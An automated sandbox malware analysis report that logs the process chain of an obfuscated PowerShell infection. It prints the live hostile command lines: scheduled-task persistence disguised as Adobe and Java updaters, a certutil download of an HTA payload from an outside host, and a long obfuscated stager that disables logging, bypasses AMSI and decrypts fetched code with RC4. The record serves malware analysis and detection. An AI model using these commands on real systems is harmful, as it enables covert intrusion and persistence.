Author: Florian Roth Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 0000000A.00000002.16525762372.003D7000.00000004.sdmp, Author: Florian Roth
Reputation:	low

Chronological Activities

Analysis Process: cmd.exe PID: 4084 Parent PID: 4056

General

Start time:	13:44:57
Start date:	19/06/2018
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	CMD.ExE /C%OmWi%
Imagebase:	0x4abb0000
File size:	302592 bytes
MD5 hash:	AD7B9C14083B52BC532FBA5948342B98
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 0000000C.00000000.16297805127.00010000.00000004.sdmp, Author: Florian Roth Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 0000000C.00000000.16298307990.00010000.00000004.sdmp, Author: Florian Roth Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 0000000C.00000000.16298524959.00010000.00000004.sdmp, Author: Florian Roth Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 0000000C.00000000.16298084982.00010000.00000004.sdmp, Author: Florian Roth Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 0000000C.00000002.16530163707.00396000.00000004.sdmp, Author: Florian Roth Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 0000000C.00000002.16530128762.00370000.00000004.sdmp, Author: Florian Roth Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 0000000C.00000002.16530199944.003A5000.00000004.sdmp, Author: Florian Roth Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 0000000C.00000002.16530262653.005E0000.00000004.sdmp, Author: Florian Roth Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 0000000C.00000003.16298709914.00010000.00000004.sdmp, Author: Florian Roth
Reputation:	low

Chronological Activities

Analysis Process: cmd.exe PID: 4092 Parent PID: 4084

General

Start time:	13:44:57
Start date:	19/06/2018
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /S /D /c' ecHo IEX (GI enV:Kjv).valUe '
Imagebase:	0x4abb0000
File size:	302592 bytes
MD5 hash:	AD7B9C14083B52BC532FBA5948342B98
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 0000000D.00000000.16298887951.00010000.00000004.sdmp, Author: Florian Roth Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 0000000D.00000000.16299447192.00010000.00000004.sdmp, Author: Florian Roth Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 0000000D.00000000.16300196558.00010000.00000004.sdmp, Author: Florian Roth Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 0000000D.00000000.16300331558.00010000.00000004.sdmp, Author: Florian Roth Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 0000000D.00000002.16300827017.00080000.00000004.sdmp, Author: Florian Roth Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 0000000D.00000002.16301298263.002E0000.00000004.sdmp, Author: Florian Roth Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 0000000D.00000002.16301400720.00306000.00000004.sdmp, Author: Florian Roth Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 0000000D.00000003.16300533489.00010000.00000004.sdmp, Author: Florian Roth
Reputation:	low

Chronological Activities

Analysis Process: powershell.exe PID: 2092 Parent PID: 4084

General

Start time:	13:44:58
Start date:	19/06/2018
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	powERSHeLl -nOnInTeRac -eXecUTiOn byPASs -NOeX -NoPRofiL -WiN hIddEN -
Imagebase:	0x227b0000
File size:	452608 bytes
MD5 hash:	92F44E405DB16AC55D97E3BFE3B132FA
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 0000000E.00000002.16532104215.01210000.00000004.sdmp, Author: Florian Roth Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 0000000E.00000002.16532260705.01300000.00000004.sdmp, Author: Florian Roth Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 0000000E.00000002.16532283238.01307000.00000004.sdmp, Author: Florian Roth Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 0000000E.00000002.16538668028.044ED000.00000004.sdmp, Author: Florian Roth
Reputation:	low

Chronological Activities

Analysis Process: DW20.EXE PID: 1176 Parent PID: 3664

General

Start time:	13:45:43
Start date:	19/06/2018
Path:	C:\Program Files\Common Files\microsoft shared\DW\DW20.EXE
Wow64 process (32bit):	false
Commandline:	'C:\PROGRA~1\COMMON~1\MICROS~1\DW\DW20.EXE' -x -s 1516
Imagebase:	0x2d9a0000
File size:	839360 bytes
MD5 hash:	B15169774D98C41C0DC54257ACEC3712
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low

Chronological Activities

Analysis Process: DWWIN.EXE PID: 268 Parent PID: 1176

General

Start time:	13:45:44
Start date:	19/06/2018
Path:	C:\Windows\System32\DWWIN.EXE
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\dwwin.exe -x -s 1516
Imagebase:	0x100000
File size:	130048 bytes
MD5 hash:	5DF543E0F1EE5D50EE1865263AA61246
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low

Chronological Activities

Analysis Process: WerFault.exe PID: 2272 Parent PID: 3664

General

Start time:	13:45:44
Start date:	19/06/2018
Path:	C:\Windows\System32\WerFault.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\WerFault.exe -u -p 3664 -s 1460
Imagebase:	0xe00000
File size:	360448 bytes
MD5 hash:	5FEAB868CAEDBBD1B7A145CA8261E4AA
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low

Chronological Activities

Analysis Process: schtasks.exe PID: 2200 Parent PID: 2092

General

Start time:	13:45:50
Start date:	19/06/2018
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	'C:\Windows\system32\schtasks.exe' /query
Imagebase:	0xe20000
File size:	179712 bytes
MD5 hash:	2003E9B15E1C502B146DAD2E383AC1E3
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 00000013.00000000.16423513415.00010000.00000004.sdmp, Author: Florian Roth Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 00000013.00000000.16423696288.00010000.00000004.sdmp, Author: Florian Roth Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 00000013.00000000.16424010643.00010000.00000004.sdmp, Author: Florian Roth Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 00000013.00000000.16424296226.00010000.00000004.sdmp, Author: Florian Roth Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 00000013.00000002.16425519548.002F0000.00000004.sdmp, Author: Florian Roth Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 00000013.00000002.16425863355.005E0000.00000004.sdmp, Author: Florian Roth Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 00000013.00000003.16424469175.00010000.00000004.sdmp, Author: Florian Roth
Reputation:	low

Chronological Activities

Analysis Process: findstr.exe PID: 2568 Parent PID: 2092

General

Start time:	13:45:52
Start date:	19/06/2018
Path:	C:\Windows\System32\findstr.exe
Wow64 process (32bit):	false
Commandline:	'C:\Windows\system32\findstr.exe' /i AdobeUpdateTaskDailyCore
Imagebase:	0x340000
File size:	62976 bytes
MD5 hash:	18F02C555FBC9885DF9DB77754D6BB9B
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 00000014.00000000.16427157568.00010000.00000004.sdmp, Author: Florian Roth Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 00000014.00000000.16427626069.00010000.00000004.sdmp, Author: Florian Roth Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 00000014.00000000.16427801984.00010000.00000004.sdmp, Author: Florian Roth Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 00000014.00000000.16427909144.00010000.00000004.sdmp, Author: Florian Roth Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 00000014.00000002.16428253744.00086000.00000004.sdmp, Author: Florian Roth Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 00000014.00000002.16428237813.00060000.00000004.sdmp, Author: Florian Roth Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 00000014.00000002.16428345115.002F0000.00000004.sdmp, Author: Florian Roth Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 00000014.00000003.16428100823.00010000.00000004.sdmp, Author: Florian Roth
Reputation:	low

Chronological Activities

Analysis Process: schtasks.exe PID: 2460 Parent PID: 2092

General

Start time:	13:45:55
Start date:	19/06/2018
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	'C:\Windows\system32\schtasks.exe' /Create /RL HIGHEST /F /SC DAILY /ST 10:00 /TN AdobeUpdateTaskDailyCore /TR 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -c \'& $env:isjeuccptoxa ($env:jtkfvddqlpyc + $env:kulgweeimqae + $env:lvmhxfvjnrbg + $env:mwniywwkosci)\''
Imagebase:	0xa10000
File size:	179712 bytes
MD5 hash:	2003E9B15E1C502B146DAD2E383AC1E3
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 00000015.00000000.16435013085.00010000.00000004.sdmp, Author: Florian Roth Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 00000015.00000000.16435224699.00010000.00000004.sdmp, Author: Florian Roth Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 00000015.00000000.16434819215.00010000.00000004.sdmp, Author: Florian Roth Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 00000015.00000000.16435443949.00010000.00000004.sdmp, Author: Florian Roth Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 00000015.00000003.16435713321.00010000.00000004.sdmp, Author: Florian Roth
Reputation:	low

Chronological Activities

Analysis Process: taskeng.exe PID: 2232 Parent PID: 820

General

Start time:	10:00:00
Start date:	20/06/2018
Path:	C:\Windows\System32\taskeng.exe
Wow64 process (32bit):	false
Commandline:	taskeng.exe {180BD5BB-1663-4FC8-9FDE-050CD066A9C0} S-1-5-21-312302014-279660585-3511680526-1004:computer\user:Interactive:[1]
Imagebase:	0xef0000
File size:	192000 bytes
MD5 hash:	4F2659160AFCCA990305816946F69407
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 00000016.00000002.16550395399.00260000.00000004.sdmp, Author: Florian Roth Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 00000016.00000002.16550953531.00530000.00000004.sdmp, Author: Florian Roth Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 00000016.00000003.16441425216.00010000.00000004.sdmp, Author: Florian Roth Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 00000016.00000000.16440999829.00010000.00000004.sdmp, Author: Florian Roth
Reputation:	low

Chronological Activities

Analysis Process: powershell.exe PID: 2428 Parent PID: 2232

General

Start time:	10:00:00
Start date:	20/06/2018
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -c '& $env:isjeuccptoxa ($env:jtkfvddqlpyc + $env:kulgweeimqae + $env:lvmhxfvjnrbg + $env:mwniywwkosci)'
Imagebase:	0x227b0000
File size:	452608 bytes
MD5 hash:	92F44E405DB16AC55D97E3BFE3B132FA
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 00000017.00000002.16557924955.01C50000.00000004.sdmp, Author: Florian Roth
Reputation:	low

Chronological Activities

Analysis Process: schtasks.exe PID: 2396 Parent PID: 2092

General

Start time:	10:00:05
Start date:	20/06/2018
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	'C:\Windows\system32\schtasks.exe' /query
Imagebase:	0x830000
File size:	179712 bytes
MD5 hash:	2003E9B15E1C502B146DAD2E383AC1E3
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 00000018.00000000.16453096494.00010000.00000004.sdmp, Author: Florian Roth Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 00000018.00000000.16453674876.00010000.00000004.sdmp, Author: Florian Roth Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 00000018.00000000.16453891780.00010000.00000004.sdmp, Author: Florian Roth Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 00000018.00000002.16455102821.000E0000.00000004.sdmp, Author: Florian Roth Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 00000018.00000002.16455015171.000B0000.00000004.sdmp, Author: Florian Roth Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 00000018.00000003.16454255633.00010000.00000004.sdmp, Author: Florian Roth Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 00000018.00000000.16453553931.00010000.00000004.sdmp, Author: Florian Roth
Reputation:	low

Chronological Activities

Analysis Process: findstr.exe PID: 2592 Parent PID: 2092

General

Start time:	10:00:07
Start date:	20/06/2018
Path:	C:\Windows\System32\findstr.exe
Wow64 process (32bit):	false
Commandline:	'C:\Windows\system32\findstr.exe' /i JavaUpdateTaskCore
Imagebase:	0x270000
File size:	62976 bytes
MD5 hash:	18F02C555FBC9885DF9DB77754D6BB9B
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 0000001A.00000000.16458141609.00010000.00000004.sdmp, Author: Florian Roth Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 0000001A.00000000.16458311882.00010000.00000004.sdmp, Author: Florian Roth Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 0000001A.00000000.16458528912.00010000.00000004.sdmp, Author: Florian Roth Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 0000001A.00000000.16458843270.00010000.00000004.sdmp, Author: Florian Roth Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 0000001A.00000002.16459856147.00160000.00000004.sdmp, Author: Florian Roth Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 0000001A.00000002.16459880486.00186000.00000004.sdmp, Author: Florian Roth Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 0000001A.00000002.16459967558.003A0000.00000004.sdmp, Author: Florian Roth Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 0000001A.00000003.16459226751.00010000.00000004.sdmp, Author: Florian Roth
Reputation:	low

Chronological Activities

Analysis Process: certutil.exe PID: 2528 Parent PID: 2092

General

Start time:	10:00:08
Start date:	20/06/2018
Path:	C:\Windows\System32\certutil.exe
Wow64 process (32bit):	false
Commandline:	'C:\Windows\System32\certutil.exe' -urlcache -split -f https://mysent.org/access.log.txt C:\Users\user\AppData\Local\Microsoft\Windows\WER\ReportArchive\sysmodule.hta
Imagebase:	0x560000
File size:	903168 bytes
MD5 hash:	0D52559AEF4AA5EAC82F530617032283
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 0000001B.00000000.16460451553.00010000.00000004.sdmp, Author: Florian Roth Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 0000001B.00000000.16460674878.00010000.00000004.sdmp, Author: Florian Roth Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 0000001B.00000000.16460822174.00010000.00000004.sdmp, Author: Florian Roth Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 0000001B.00000000.16461111447.00010000.00000004.sdmp, Author: Florian Roth Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 0000001B.00000002.16468544452.00110000.00000004.sdmp, Author: Florian Roth Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 0000001B.00000002.16470994291.0153D000.00000004.sdmp, Author: Florian Roth Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 0000001B.00000002.16471109913.01660000.00000004.sdmp, Author: Florian Roth Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 0000001B.00000002.16471226487.016C0000.00000004.sdmp, Author: Florian Roth Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 0000001B.00000002.16469158345.004B1000.00000004.sdmp, Author: Florian Roth Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 0000001B.00000002.16468815770.003E0000.00000004.sdmp, Author: Florian Roth Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 0000001B.00000002.16468838264.00406000.00000004.sdmp, Author: Florian Roth Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 0000001B.00000003.16461517453.00010000.00000004.sdmp, Author: Florian Roth Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 0000001B.00000003.16465931308.0011C000.00000004.sdmp, Author: Florian Roth Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 0000001B.00000003.16468242022.004B0000.00000004.sdmp, Author: Florian Roth Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 0000001B.00000003.16468174726.004A5000.00000004.sdmp, Author: Florian Roth Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 0000001B.00000003.16468191650.004AC000.00000004.sdmp, Author: Florian Roth Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 0000001B.00000003.16468206147.00481000.00000004.sdmp, Author: Florian Roth Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 0000001B.00000003.16468140620.004B2000.00000004.sdmp, Author: Florian Roth
Reputation:	low

Chronological Activities

Analysis Process: schtasks.exe PID: 2624 Parent PID: 2092

General

Start time:	10:00:13
Start date:	20/06/2018
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	'C:\Windows\system32\schtasks.exe' /Create /RL HIGHEST /F /SC DAILY /ST 11:10 /TN JavaUpdateTaskCore /TR C:\Users\user\AppData\Local\Microsoft\Windows\WER\ReportArchive\sysmodule.hta
Imagebase:	0xed0000
File size:	179712 bytes
MD5 hash:	2003E9B15E1C502B146DAD2E383AC1E3
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 0000001D.00000000.16472465532.00010000.00000004.sdmp, Author: Florian Roth Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 0000001D.00000000.16472603519.00010000.00000004.sdmp, Author: Florian Roth Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 0000001D.00000000.16472892522.00010000.00000004.sdmp, Author: Florian Roth Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 0000001D.00000000.16472742485.00010000.00000004.sdmp, Author: Florian Roth Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 0000001D.00000002.16473840713.00340000.00000004.sdmp, Author: Florian Roth Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 0000001D.00000002.16473711541.00270000.00000004.sdmp, Author: Florian Roth Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 0000001D.00000002.16473904470.00366000.00000004.sdmp, Author: Florian Roth Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 0000001D.00000003.16473177431.00010000.00000004.sdmp, Author: Florian Roth
Reputation:	low

Chronological Activities

Analysis Process: mshta.exe PID: 2388 Parent PID: 2232

General

Start time:	11:10:00
Start date:	20/06/2018
Path:	C:\Windows\System32\mshta.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\mshta.exe 'C:\Users\user\AppData\Local\Microsoft\Windows\WER\ReportArchive\sysmodule.hta'
Imagebase:	0x13c0000
File size:	13312 bytes
MD5 hash:	ABDFC692D9FE43E2BA8FE6CB5A8CB95A
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 0000001E.00000000.16475070317.00010000.00000004.sdmp, Author: Florian Roth Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 0000001E.00000000.16475268349.00010000.00000004.sdmp, Author: Florian Roth Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 0000001E.00000000.16474820967.00010000.00000004.sdmp, Author: Florian Roth Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 0000001E.00000000.16474461723.00010000.00000004.sdmp, Author: Florian Roth Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 0000001E.00000003.16476187232.00010000.00000004.sdmp, Author: Florian Roth
Reputation:	low

Chronological Activities

Analysis Process: cmd.exe PID: 480 Parent PID: 2388

General

Start time:	11:10:11
Start date:	20/06/2018
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	'C:\Windows\System32\cmd.exe' /C 'set KjV= SeT-VarIABlE eiP ( [tYPe]('{7}{5}{1}{11}{0}{3}{2}{6}{8}{4}{10}{9}{12}' -F 'D','tioN','onArY','icti','tE','LlEC','[ST','cO','RinG,SYS','OBJ','M.','S.GenerIC.','eCT') ) ; ${tV`R`32} =[tYpE]('{2}{0}{3}{1}'-F'R','loCK','SC','iPtB') ; ${g`Nf} = [type]('{1}{0}' -F'f','RE') ; Set-iTeM ('vAriaB'+'le:R'+'tHA'+'C5') ( [type]('{7}{6}{5}{3}{2}{1}{8}{0}{4}'-f'N','epOi','Ic','v','aGER','et.sEr','Tem.n','sys','NTma') ); seT qcj ( [tyPe]('{1}{3}{6}{4}{5}{0}{2}' -F'uE','sY','st','sTE','WeB','rEQ','M.Net.') ) ; sET-iTem VAriAblE:eSY ( [tyPE]('{1}{0}{4}{2}{3}' -F'YsTeM.NeT.','S','DEN','TIALCAchE','CRe'));set-iTem VARIaBLe:r4imz ( [type]('{2}{4}{0}{3}{1}'-F 'T.EN','iNg','SysTem.te','cOD','X') ) ;If(${pS`Vers`ionTa`Ble}.'P`SVersION'.'MaJ`OR' -GE 3){${g`PF}= ${G`Nf}.'aSsE`mb`Ly'.('{1}{0}' -f'tTYPe','GE').Invoke(('{6}{1}{0}{3}{2}{4}{7}{5}' -f'na','tem.Ma','nt.Autom','geme','ati','.Utils','Sys','on')).'GETFiE`LD'(('{0}{4}{2}{1}{3}'-f 'cachedGr','Setti','icy','ngs','oupPol'),'N'+('{0}{4}{2}{3}{1}' -f 'o','tic','c,St','a','nPubli'));If(${g`Pf}){${G`PC}=${g`Pf}.('{1}{0}{2}'-f 'VaL','Get','Ue').Invoke(${nu`Ll});IF(${g`pc}[('{1}{0}{2}'-f 'rip','Sc','tB')+('{0}{3}{2}{1}' -f 'lo','ogging','kL','c')]){${G`PC}[('{2}{0}{1}' -f'rip','tB','Sc')+('{2}{3}{0}{1}' -f'in','g','lockL','ogg')][('{3}{1}{0}{2}'-f 'ip','eScr','tB','Enabl')+('{0}{2}{1}'-f'lo','ing','ckLogg')]=0;${G`Pc}[('{2}{1}{0}'-f'iptB','r','Sc')+('{0}{2}{1}' -f'l','kLogging','oc')][('{3}{7}{0}{4}{2}{1}{6}{5}'-f'crip','nLo','Invocatio','Enabl','tBlock','ing','gg','eS')]=0}${V`Al}= ( VArIaBle Eip -vAL )::('{0}{1}' -f 'Ne','w').Invoke();${V`AL}.('{1}{0}'-f'dD','A').Invoke(('{0}{1}{3}{2}'-f'En','a','leScriptB','b')+('{2}{1}{0}' -f'gging','ckLo','lo'),0);${v`Al}.('{0}{1}' -f'A','Dd').Invoke(('{0}{8}{6}{5}{2}{3}{1}{4}{7}' -f 'E','Log','o','ckInvocation','g','Bl','bleScript','ing','na'),0);${g`PC}[((('{8}{12}{14}{15}{9}{5}{0}{6}{7}{3}{4}{10}{13}{1}{16}{2}{17}{11}' -f'Po','sTK','el','KSW','ind','TKS','liciesTKSMicrosof','tT','HKEY_LO','are','o','iptB','CAL_MACHIN','w','ETK','SSoftw','SPowerSh','lTKSScr'))-REpLace ([CHAR]84+[CHAR]75+[CHAR]83),[CHAR]92)+('{1}{2}{0}'-f 'ging','loc','kLog')]=${v`AL}}ELse{ ${tvr`32}.'GeTFiE`LD'(('{1}{2}{0}' -f 'es','si','gnatur'),'N'+('{2}{1}{0}'-f'Static','c,','onPubli')).('{2}{0}{1}' -f 'TV','Alue','Se').Invoke(${N`ULL},(^&('{3}{0}{1}{2}' -f 'ew-Ob','Je','ct','N') ('{4}{3}{0}{1}{2}{5}{6}' -f'Ns.','GENEric.HAShSE','t[','lLeCtIO','Co','strI','ng]')))} ( ItEM ('vARi'+'A'+'BL'+'e:gNF') ).'Va`LUE'.'aSS`EM`BLy'.('{1}{0}{2}'-f 'yp','GetT','E').Invoke(('{4}{0}{3}{6}{1}{5}{2}'-f 'anag','msi','ils','emen','System.M','Ut','t.Automation.A'))^\|^&('?'){${_}}^\|^&('%'){${_}.('{2}{1}{0}'-f 'd','FieL','GEt').Invoke(('{4}{0}{1}{3}{2}'-f 'a','il','d','e','amsiInitF'),('{1}{4}{2}{0}{3}' -f 'ic,Stati','NonPu','l','c','b')).('{1}{0}'-f'ue','SETVAL').Invoke(${n`ULL},${TR`Ue})};}; ( gi ('vArIabLE:rt'+'ha'+'C'+'5')).'v`AlUE'::'expEC`T`100conTin`Ue'=0;${wc}=^&('{1}{2}{0}' -f 'BjECt','NEw-','O') ('{2}{5}{3}{4}{1}{0}' -f'nt','Ie','SYST','eb','CL','EM.NET.W');${u}=('{0}{13}{12}{1}{9}{4}{8}{16}{15}{2}{14}{5}{11}{17}{7}{3}{6}{10}' -f 'Mozi','(Wind',' T','e G','ws','i','e','11.0) lik','NT','o','cko','dent/7','.0 ','lla/5','r','; WOW64;',' 6.1','.0; rv:'); ${R`TH`Ac5}::'SeRVERCEr`T`i`FiCateVALIDat`i`On`cAll`B`ACk' = {${t`Rue}};${Wc}.'HEAd`ERs'.('{1}{0}' -f 'd','Ad').Invoke(('{1}{3}{0}{2}'-f '-Ag','Us','ent','er'),${u});${wC}.'p`ROxY'= (Gci VaRIablE:qCj ).'va`lue'::'D`eFAU`ltW`EbPROXY';${Wc}.'prO`Xy'.'C`REdent`ia`LS' = ( DiR VARIable:Esy ).'Va`lUE'::'dEFAu`LtNETWoRk`C`Re`DENTIals';${k}= ( Get-vaRiablE R4Imz -VAl )::'aS`CIi'.('{0}{1}'-f 'GEtBy','tEs').Invoke(('{2}{1}{4}{6}{0}{3}{5}'-f'cee5aa0e8b08','3','d20923','89bb','c','1e','7d7d7a'));${r}={${D},${K}=${AR`Gs};${s}=0..255;0..255^\|.('%'){${j}=(${j}+${S}[${_}]+${k}[${_}%${K}.'COU`NT'])%256;${S}[${_}],${s}[${J}]=${s}[${j}],${s}[${_}]};${d}^\|.('%'){${I}=(${I}+1)%256;${h}=(${h}+${S}[${I}])%256;${s}[${I}],${S}[${H}]=${s}[${h}],${s}[${i}];${_}-BxOR${s}[(${s}[${i}]+${S}[${h}])%256]}};${wC}.'Hea`D`ErS'.('{0}{1}' -f'AD','D').Invoke(('{1}{0}'-f'e','Cooki'),('{6}{2}{7}{8}{3}{5}{1}{4}{0}' -f 